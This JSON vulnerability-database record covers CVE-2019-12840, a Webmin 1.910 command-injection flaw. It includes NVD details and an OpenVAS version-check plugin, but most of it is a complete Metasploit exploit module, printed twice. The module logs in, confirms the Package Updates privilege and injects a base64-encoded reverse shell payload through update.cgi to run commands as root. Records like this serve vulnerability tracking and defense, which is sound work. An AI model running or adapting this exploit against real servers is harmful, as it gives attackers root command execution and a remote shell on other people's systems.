{"lastseen": "2019-06-22T11:39:20", "references": [], "description": "", "reporter": "Ozkan Mustafa Akkus", "published": "2019-06-11T00:00:00", "type": "packetstorm", "title": "Webmin 1.910 Remote Command Execution", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-12840"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/WEBMIN_PACKAGEUP_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113409"]}], "modified": "2019-06-22T11:39:20", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2019-06-22T11:39:20", "rev": 2}, "vulnersScore": 7.2}, "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12840"], "modified": "2019-06-11T00:00:00", "id": "PACKETSTORM:153372", "href": "https://packetstormsecurity.com/files/153372/Webmin-1.910-Remote-Command-Execution.html", "viewCount": 186, "sourceData": "`##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##



class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking



include Msf::Exploit::Remote::HttpClient



def initialize(info = {})

super(update_info(info,

'Name' => 'Webmin Package Updates Remote Command Execution',

'Description' => %q(

This module exploits an arbitrary command execution vulnerability in Webmin

1.910 and lower versions. Any user authorized to the \"Package Updates\"

module can execute arbitrary commands with root privileges.

),

'Author' => [

'AkkuS <\u00d6zkan Mustafa Akku\u015f>' # Vulnerability Discovery, MSF PoC module

],

'License' => MSF_LICENSE,

'References' =>

[

['CVE', '2019-12840'],

['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']

],

'Privileged' => true,

'Payload' =>

{

'DisableNops' => true,

'Space' => 512,

'Compat' =>

{

'PayloadType' => 'cmd'

}

},

'DefaultOptions' =>

{

'RPORT' => 10000,

'SSL' => false,

'PAYLOAD' => 'cmd/unix/reverse_perl'

},

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets' => [['Webmin <= 1.910', {}]],

'DisclosureDate' => 'May 16 2019',

'DefaultTarget' => 0)

)

register_options [

OptString.new('USERNAME', [true, 'Webmin Username']),

OptString.new('PASSWORD', [true, 'Webmin Password']),

OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])

]

end



def peer

\"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}\"

end



def login

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'session_login.cgi'),

'cookie' => 'testing=1', # it must be used for \"Error - No cookies\"

'vars_post' => {

'page' => '',

'user' => datastore['USERNAME'],

'pass' => datastore['PASSWORD']

}

})



if res && res.code == 302 && res.get_cookies =~ /sid=(\\w+)/

return $1

end



return nil unless res

''

end



def check

cookie = login

return CheckCode::Detected if cookie == ''

return CheckCode::Unknown if cookie.nil?



vprint_status('Attempting to execute...')

# check version

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, \"sysinfo.cgi\"),

'cookie' => \"sid=#{cookie}\",

'vars_get' => { \"xnavigation\" => \"1\" }

})



if res && res.code == 302 && res.body

version = res.body.split(\"- Webmin 1.\")[1]

return CheckCode::Detected if version.nil?

version = version.split(\" \")[0]

if version <= \"910\"

# check package update priv

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, \"package-updates/\"),

'cookie' => \"sid=#{cookie}\"

})



if res && res.code == 200 && res.body =~ /Software Package Update/

print_status(\"NICE! #{datastore['USERNAME']} has the right to >>Package Update<<\")

return CheckCode::Vulnerable

end

end

end

print_error(\"#{datastore['USERNAME']} doesn't have the right to >>Package Update<<\")

print_status(\"Please try with another user account!\")

CheckCode::Safe

end



def exploit

cookie = login

if cookie == '' || cookie.nil?

fail_with(Failure::Unknown, 'Failed to retrieve session cookie')

end

print_good(\"Session cookie: #{cookie}\")



res = send_request_cgi(

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),

'headers' => { 'Referer' => \"#{peer}/sysinfo.cgi?xnavigation=1\" },

'cookie' => \"sid=#{cookie}\"

)

unless res && res.code == 200

fail_with(Failure::Unknown, 'Request failed')

end



print_status(\"Attempting to execute the payload...\")

run_update(cookie)

end



def run_update(cookie)

@b64p = Rex::Text.encode_base64(payload.encoded)

perl_payload = 'bash -c \"{echo,' + \"#{@b64p}\" + '}|{base64,-d}|{bash,-i}\"'

payload = Rex::Text.uri_encode(perl_payload)



res = send_request_cgi(

{

'method' => 'POST',

'cookie' => \"sid=#{cookie}\",

'ctype' => 'application/x-www-form-urlencoded',

'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),

'headers' =>

{

'Referer' => \"#{peer}/package-updates/?xnavigation=1\"

},

'data' => \"u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages\"

})

end

end



`

", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/153372/webmin_packageup_rce.rb.txt"}

{"cve": [{"lastseen": "2020-09-21T14:54:49", "description": "In Webmin through 1.910, any user authorized to the \"Package Updates\" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-15T20:29:00", "title": "CVE-2019-12840", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12840"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:webmin:webmin:1.910"], "id": "CVE-2019-12840", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12840", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:webmin:webmin:1.910:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-09-26T01:06:05", "description": "This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the \"Package Updates\" module can execute arbitrary commands with root privileges.

", "published": "2019-06-16T15:26:00", "type": "metasploit", "title": "Webmin Package Updates Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12840"], "modified": "2019-06-19T13:31:48", "id": "MSF:EXPLOIT/LINUX/HTTP/WEBMIN_PACKAGEUP_RCE", "href": "", "sourceData": "##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##



class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking



include Msf::Exploit::Remote::HttpClient



def initialize(info = {})

super(update_info(info,

'Name' => 'Webmin Package Updates Remote Command Execution',

'Description' => %q(

This module exploits an arbitrary command execution vulnerability in Webmin

1.910 and lower versions. Any user authorized to the \"Package Updates\"

module can execute arbitrary commands with root privileges.

),

'Author' => [

'AkkuS <\u00d6zkan Mustafa Akku\u015f>' # Vulnerability Discovery, MSF PoC module

],

'License' => MSF_LICENSE,

'References' =>

[

['CVE', '2019-12840'],

['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']

],

'Privileged' => true,

'Payload' =>

{

'DisableNops' => true,

'Space' => 512,

'Compat' =>

{

'PayloadType' => 'cmd'

}

},

'DefaultOptions' =>

{

'RPORT' => 10000,

'SSL' => false,

'PAYLOAD' => 'cmd/unix/reverse_perl'

},

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets' => [['Webmin <= 1.910', {}]],

'DisclosureDate' => 'May 16 2019',

'DefaultTarget' => 0)

)

register_options [

OptString.new('USERNAME', [true, 'Webmin Username']),

OptString.new('PASSWORD', [true, 'Webmin Password']),

OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])

]

end



def peer

\"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}\"

end



def login

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'session_login.cgi'),

'cookie' => 'testing=1', # it must be used for \"Error - No cookies\"

'vars_post' => {

'page' => '',

'user' => datastore['USERNAME'],

'pass' => datastore['PASSWORD']

}

})



if res && res.code == 302 && res.get_cookies =~ /sid=(\\w+)/

return $1

end



return nil unless res

''

end



def check

cookie = login

return CheckCode::Detected if cookie == ''

return CheckCode::Unknown if cookie.nil?



vprint_status('Attempting to execute...')

# check version

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path, \"sysinfo.cgi\"),

'cookie' => \"sid=#{cookie}\",

'vars_get' => { \"xnavigation\" => \"1\" }

})



if res && res.code == 302 && res.body

version = res.body.split(\"- Webmin 1.\")[1]

return CheckCode::Detected if version.nil?

version = version.split(\" \")[0]

if version <= \"910\"

# check package update priv

res = send_request_cgi({

'uri' => normalize_uri(target_uri.path, \"package-updates/\"),

'cookie' => \"sid=#{cookie}\"

})



if res && res.code == 200 && res.body =~ /Software Package Update/

print_status(\"NICE! #{datastore['USERNAME']} has the right to >>Package Update<<\")

return CheckCode::Vulnerable

end

end

end

print_error(\"#{datastore['USERNAME']} doesn't have the right to >>Package Update<<\")

print_status(\"Please try with another user account!\")

CheckCode::Safe

end



def exploit

cookie = login

if cookie == '' || cookie.nil?

fail_with(Failure::Unknown, 'Failed to retrieve session cookie')

end

print_good(\"Session cookie: #{cookie}\")



res = send_request_cgi(

'method' => 'POST',

'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),

'headers' => { 'Referer' => \"#{peer}/sysinfo.cgi?xnavigation=1\" },

'cookie' => \"sid=#{cookie}\"

)

unless res && res.code == 200

fail_with(Failure::Unknown, 'Request failed')

end



print_status(\"Attempting to execute the payload...\")

run_update(cookie)

end



def run_update(cookie)

@b64p = Rex::Text.encode_base64(payload.encoded)

perl_payload = 'bash -c \"{echo,' + \"#{@b64p}\" + '}|{base64,-d}|{bash,-i}\"'

payload = Rex::Text.uri_encode(perl_payload)



res = send_request_cgi(

{

'method' => 'POST',

'cookie' => \"sid=#{cookie}\",

'ctype' => 'application/x-www-form-urlencoded',

'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),

'headers' =>

{

'Referer' => \"#{peer}/package-updates/?xnavigation=1\"

},

'data' => \"u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages\"

})

end

end



", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/webmin_packageup_rce.rb"}], "openvas": [{"lastseen": "2020-06-19T18:46:38", "description": "Webmin is prone to a remote code execution (RCE) vulnerability.", "edition": 7, "published": "2019-06-17T00:00:00", "title": "Webmin <= 1.941 Remote Code Execution (RCE) Vulnerability", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12840"], "modified": "2020-06-17T00:00:00", "id": "OPENVAS:1361412562310113409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113409", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH

#

# SPDX-License-Identifier: GPL-2.0-or-later

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.113409\");

script_version(\"2020-06-17T14:30:36+0000\");

script_tag(name:\"last_modification\", value:\"2020-06-17 14:30:36 +0000 (Wed, 17 Jun 2020)\");

script_tag(name:\"creation_date\", value:\"2019-06-17 10:11:59 +0000 (Mon, 17 Jun 2019)\");

script_tag(name:\"cvss_base\", value:\"9.0\");

script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");



script_tag(name:\"qod_type\", value:\"remote_banner\");



script_tag(name:\"solution_type\", value:\"WillNotFix\");



script_cve_id(\"CVE-2019-12840\");



script_name(\"Webmin <= 1.941 Remote Code Execution (RCE) Vulnerability\");



script_category(ACT_GATHER_INFO);



script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");

script_family(\"Web application abuses\");

script_dependencies(\"webmin.nasl\");

script_mandatory_keys(\"usermin_or_webmin/installed\");



script_tag(name:\"summary\", value:\"Webmin is prone to a remote code execution (RCE) vulnerability.\");



script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");



script_tag(name:\"insight\", value:\"Any user authorized to the 'Package Updates' module can execute arbitrary

commands with root privileges via the data parameter to update.cgi.\");



script_tag(name:\"impact\", value:\"Successful exploitation would allow an authorized attacker to gain

control over the target system.\");



script_tag(name:\"affected\", value:\"Webmin through version 1.941.\");



script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure

of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer

release, disable respective features, remove the product or replace the product by another one.\");

# Note: Vendor does not accept the vulnerability as workable exploit, because it requires that the attacker

# already knows the root password. Hence there will be no fix for it in Webmin.

script_xref(name:\"URL\", value:\"https://pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html\");

script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/46984\");



exit(0);

}



CPE = \"cpe:/a:webmin:webmin\";



include( \"host_details.inc\" );

include( \"version_func.inc\" );



if( ! port = get_app_port( cpe: CPE ) )

exit( 0 );



if( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )

exit( 0 );



version = infos[\"version\"];

location = infos[\"location\"];



if( version_is_less_equal( version: version, test_version: \"1.941\" ) ) {

report = report_fixed_ver( installed_version: version, fixed_version: \"None\", install_path: location );

security_message( data: report, port: port );

exit( 0 );

}



exit( 0 );

", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}